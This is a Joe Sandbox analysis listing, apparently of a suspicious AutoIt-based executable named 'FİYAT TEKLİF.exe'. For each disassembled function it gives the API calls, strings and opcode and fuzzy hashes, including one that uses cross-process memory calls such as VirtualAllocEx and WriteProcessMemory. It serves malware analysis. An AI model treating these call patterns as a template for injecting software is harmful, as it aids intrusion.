Function 009BD73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 009BD752

Part of subcall function 009B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000), ref: 009B29DE
Part of subcall function 009B29C8: GetLastError.KERNEL32(00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000,00000000), ref: 009B29F0

_free.LIBCMT ref: 009BD764
_free.LIBCMT ref: 009BD776
_free.LIBCMT ref: 009BD788
_free.LIBCMT ref: 009BD79A

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d429761414c6fc8f95bfe467b8edf7694f25fe340144ca5375ed49d40c469469
Instruction ID: befcf586a42ae01fa70eef0dbad01a2d8d6cfba3b1adc6f4ee762d7ae504c58b
Opcode Fuzzy Hash: d429761414c6fc8f95bfe467b8edf7694f25fe340144ca5375ed49d40c469469
Instruction Fuzzy Hash: F5F0C976546208BBC665EBA4FBC599677DDFB857307940C05F04CD7502DA21F8808664

Uniqueness

Uniqueness Score: -1.00%

Function 009E5C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 009E5C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 009E5C6F
MessageBeep.USER32(00000000), ref: 009E5C87
KillTimer.USER32(?,0000040A), ref: 009E5CA3
EndDialog.USER32(?,00000001), ref: 009E5CBD

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: ff1d7340b1727e2427f67e6ebb70765fc6b2b6b25a97fbf471db5860b24c7ab7
Instruction ID: 45efc56679fce4d29d27d353130abd970d5984ab978ce0c0cc161d1a7b031728
Opcode Fuzzy Hash: ff1d7340b1727e2427f67e6ebb70765fc6b2b6b25a97fbf471db5860b24c7ab7
Instruction Fuzzy Hash: 5301AD30540B04ABEB21AB51DD5EFE677B8BB04B09F011559E293A10E1DBF4AD85CA90

Uniqueness

Uniqueness Score: -1.00%

Function 009B22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 009B22BE

Part of subcall function 009B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000), ref: 009B29DE
Part of subcall function 009B29C8: GetLastError.KERNEL32(00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000,00000000), ref: 009B29F0

_free.LIBCMT ref: 009B22D0
_free.LIBCMT ref: 009B22E3
_free.LIBCMT ref: 009B22F4
_free.LIBCMT ref: 009B2305

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f6976a3d6c0a78b8f75a046f55c3b3eff7aecbf3c7263faec6f9020cc85bcbb5
Instruction ID: 7ec0b099663c8f2da13669fbbaf792cc5bb8d0efc6a317468a707145b7c194e1
Opcode Fuzzy Hash: f6976a3d6c0a78b8f75a046f55c3b3eff7aecbf3c7263faec6f9020cc85bcbb5
Instruction Fuzzy Hash: 3CF0F4794013109BC692EFD8BE01EDC3B69F759772B050A56F418D6271C73105539FE5

Uniqueness

Uniqueness Score: -1.00%

Function 009995C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 009995D4
StrokeAndFillPath.GDI32(?,?,009D71F7,00000000,?,?,?), ref: 009995F0
SelectObject.GDI32(?,00000000), ref: 00999603
DeleteObject.GDI32 ref: 00999616
StrokePath.GDI32(?), ref: 00999631

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 2df6036c5b76c51de6643ad0a0a69c6ef495afb2b79176d6773cc899caa51459
Instruction ID: aa65775e2b8202a43e09ca72700a3e41b7e1de87c5da747cbb4184df4f2c7e64
Opcode Fuzzy Hash: 2df6036c5b76c51de6643ad0a0a69c6ef495afb2b79176d6773cc899caa51459
Instruction Fuzzy Hash: B6F01430046308EBDB22DFADED18BB93BA9BB05372F448218F865950F0C7308992DF64

Uniqueness

Uniqueness Score: -1.00%

Function 009B0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 009B10F9
__freea.LIBCMT ref: 009B1117

Part of subcall function 009B1537: _free.LIBCMT ref: 009B154F

Strings

am/pm, xrefs: 009B117A
a/p, xrefs: 009B11DE

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 4881d6a087ddbf41e4ba4ea72e07b92bef64e10aae27902b5d6065206123f56a
Instruction ID: 8ee1d93c4cec42699cd7ad7f74353e61503a8454899b1c595cd4e799fcd561ae
Opcode Fuzzy Hash: 4881d6a087ddbf41e4ba4ea72e07b92bef64e10aae27902b5d6065206123f56a
Instruction Fuzzy Hash: 0FD12831904206CBCB249F68CA69BFEB7F8FF46330FA84519E5119B650E3759D80CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A07B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 009A0242: EnterCriticalSection.KERNEL32(00A5070C,00A51884,?,?,0099198B,00A52518,?,?,?,009812F9,00000000), ref: 009A024D
Part of subcall function 009A0242: LeaveCriticalSection.KERNEL32(00A5070C,?,0099198B,00A52518,?,?,?,009812F9,00000000), ref: 009A028A

Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD

Part of subcall function 009A00A3: __onexit.LIBCMT ref: 009A00A9

__Init_thread_footer.LIBCMT ref: 00A07BFB

Part of subcall function 009A01F8: EnterCriticalSection.KERNEL32(00A5070C,?,?,00998747,00A52514), ref: 009A0202
Part of subcall function 009A01F8: LeaveCriticalSection.KERNEL32(00A5070C,?,00998747,00A52514), ref: 009A0235

Strings

G, xrefs: 00A07C7F
Variable must be of type 'Object'., xrefs: 00A07C3A
5, xrefs: 00A07C78

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 535116098-3733170431
Opcode ID: 0e6410b9ccdc1ec309b2cb1fef7d75e10f38c13b7df0a740e631783b0c5191db
Instruction ID: 2c1d238e636b8c27b7ab14d3eb385c4a64d0c9a47d532d456886a39c421f5c3f
Opcode Fuzzy Hash: 0e6410b9ccdc1ec309b2cb1fef7d75e10f38c13b7df0a740e631783b0c5191db
Instruction Fuzzy Hash: 01917C74A04209AFCB14EF94E991ABEB7B1FF89300F148059F8069B291DB71AE45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 009E2716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009EB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009E21D0,?,?,00000034,00000800,?,00000034), ref: 009EB42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 009E2760

Part of subcall function 009EB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009E21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 009EB3F8

Part of subcall function 009EB32A: GetWindowThreadProcessId.USER32(?,?), ref: 009EB355
Part of subcall function 009EB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,009E2194,00000034,?,?,00001004,00000000,00000000), ref: 009EB365
Part of subcall function 009EB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,009E2194,00000034,?,?,00001004,00000000,00000000), ref: 009EB37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009E27CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009E281A

Strings

@, xrefs: 009E2832

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 7a5843552f07ecd143978eccf2f16a7f95499c8de98ed5b3298788436dd965a8
Instruction ID: 621050fc487ffc1219fbdc048f268d4a9701c49ce83952002dda882d1960c25f
Opcode Fuzzy Hash: 7a5843552f07ecd143978eccf2f16a7f95499c8de98ed5b3298788436dd965a8
Instruction Fuzzy Hash: 0E415C72900218AFDB11DFA4CD42BEEBBB8EF49300F009095FA55B7181DB716E45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009B172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe,00000104), ref: 009B1769
_free.LIBCMT ref: 009B1834
_free.LIBCMT ref: 009B183E

Strings

C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe, xrefs: 009B1760, 009B1767, 009B1796, 009B17CE

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe
API String ID: 2506810119-1892435047
Opcode ID: 210db2eb84f23277a290c2dfc8b6de3a26c7044b5c0324e7b1a337c7c0bc4629
Instruction ID: c98975794f892a5b6802da17fff34e1c57c9f34e353bff8ffd61ff3e7bf375e0
Opcode Fuzzy Hash: 210db2eb84f23277a290c2dfc8b6de3a26c7044b5c0324e7b1a337c7c0bc4629
Instruction Fuzzy Hash: E2316E71A40218ABDB21DF999A95EEEBBFCFB85320F54416AF804D7211DA708E41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 009EC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 009EC306
DeleteMenu.USER32(?,00000007,00000000), ref: 009EC34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00A51990,015E5100), ref: 009EC395

Strings

0, xrefs: 009EC2DF

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 6c3d91b634f0a351a00f953daa17a741c7554c7d83432b17b14fff5243e33c45
Instruction ID: 6c91825b7aa7f27b8fc4d35962188b349899f541c4af2a6006b3ce917dbc763b
Opcode Fuzzy Hash: 6c3d91b634f0a351a00f953daa17a741c7554c7d83432b17b14fff5243e33c45
Instruction Fuzzy Hash: 7E41B2B12043819FD721DF26D844F5ABBE8AF85321F048A1DF9A5972D1D730ED06CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A14416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00A1CC08,00000000,?,?,?,?), ref: 00A144AA
GetWindowLongW.USER32 ref: 00A144C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A144D7

Strings

SysTreeView32, xrefs: 00A1447C

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: e9c9e12a6fb5a0e8555ac02fd345a613e21cd3e2f8a25d34618acb978dcc1abc
Instruction ID: 156ac405e5d1b2d24b4dae4118be53eec8ea3b0b0da3f9e04b3b2fcf41ccb9ff
Opcode Fuzzy Hash: e9c9e12a6fb5a0e8555ac02fd345a613e21cd3e2f8a25d34618acb978dcc1abc
Instruction Fuzzy Hash: 5331AB32200205AFEF209F78DC45BEA7BAAEB48334F208725F975921E0D770EC919B50

Uniqueness

Uniqueness Score: -1.00%

Function 00A0304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A0335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00A03077,?,?), ref: 00A03378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A0307A
_wcslen.LIBCMT ref: 00A0309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00A03106

Strings

255.255.255.255, xrefs: 00A03095, 00A0309A

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 6f2befddb1463483c5e4277b047c849d7dbbf49b15885c5a14a7bb372b04176d
Instruction ID: 4bb475fb338b6f4267e414292a96bcc4a2fe9a75258f1b88cc2cd4034aa50604
Opcode Fuzzy Hash: 6f2befddb1463483c5e4277b047c849d7dbbf49b15885c5a14a7bb372b04176d
Instruction Fuzzy Hash: 4B31D33A6002099FCF10CF68E585EAA77F8EF54318F248159E9158B3D2DB72EE45C761

Uniqueness

Uniqueness Score: -1.00%

Function 00A13EB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00A13F40
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00A13F54
SendMessageW.USER32(?,00001002,00000000,?), ref: 00A13F78

Strings

SysMonthCal32, xrefs: 00A13F0B

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 5260ff640d653aa8523228537818f5e6a0d1f440f96e5823d5a8cfb732a45d1e
Instruction ID: 8e2879063012f9595f3a25ba92ff17e83c27385c4ed1815f935561bde6bf3dd9
Opcode Fuzzy Hash: 5260ff640d653aa8523228537818f5e6a0d1f440f96e5823d5a8cfb732a45d1e
Instruction Fuzzy Hash: 07218B33600219BBDF259F90DC46FEA3B7AEB88724F110214FA15AB1D0D6B5A9958B90

Uniqueness

Uniqueness Score: -1.00%

Function 00A14653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00A14705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00A14713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A1471A

Strings

msctls_updown32, xrefs: 00A14684

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 4c0f78bdb3309cd5fcff72934f109aba49dfa32b16535d8a05ae47266e540bed
Instruction ID: c2bd2f74e5f24a735454fcdb17a6ed0e395db56061406bb69cda0b7fc0307cf2
Opcode Fuzzy Hash: 4c0f78bdb3309cd5fcff72934f109aba49dfa32b16535d8a05ae47266e540bed
Instruction Fuzzy Hash: D52160B5600208AFEB10DF68DCC1DB737ADEB8A7A4B040059FA109B391DB70EC52CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009E95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009E961D

Strings

#requireadmin, xrefs: 009E95D9
#OnAutoItStartRegister, xrefs: 009E95F3
#notrayicon, xrefs: 009E95B7

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 958deb6b6eb73ef1a48c42f9dee6fde53336ce410e6c8c43e2aa4635b82dd7ab
Instruction ID: 956497cf0d27fe1cd8626d45533d45077b7935f21e2437accee61d41f0f84280
Opcode Fuzzy Hash: 958deb6b6eb73ef1a48c42f9dee6fde53336ce410e6c8c43e2aa4635b82dd7ab
Instruction Fuzzy Hash: E9215E722046906AC732BB269C06FBBB3DCAFD1700F604826F9499B141EF55DD81C3D5

Uniqueness

Uniqueness Score: -1.00%

Function 00A137B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00A13840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00A13850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00A13876

Strings

Listbox, xrefs: 00A1380F

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: a3fb18e06e8b2f95a3a62ac3cf33da4d38a917e3d5299fa7595f659eeaa951c5
Instruction ID: 5cfe5605ab8f6661e5b617e43b2472b96ee2b481e061aaf76e7080834996bff5
Opcode Fuzzy Hash: a3fb18e06e8b2f95a3a62ac3cf33da4d38a917e3d5299fa7595f659eeaa951c5
Instruction Fuzzy Hash: 5A217C72610218BBEF21DF95DC85FFB376EEF89760F108124F9149B190CA759C9287A0

Uniqueness

Uniqueness Score: -1.00%

Function 009F49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009F4A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 009F4A5C
SetErrorMode.KERNEL32(00000000,?,?,00A1CC08), ref: 009F4AD0

Strings

%lu, xrefs: 009F4A6F

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 0c96f39c77774036a7716a7bec0546536907d3ee8cd632b8fccfa0ca1fcff42f
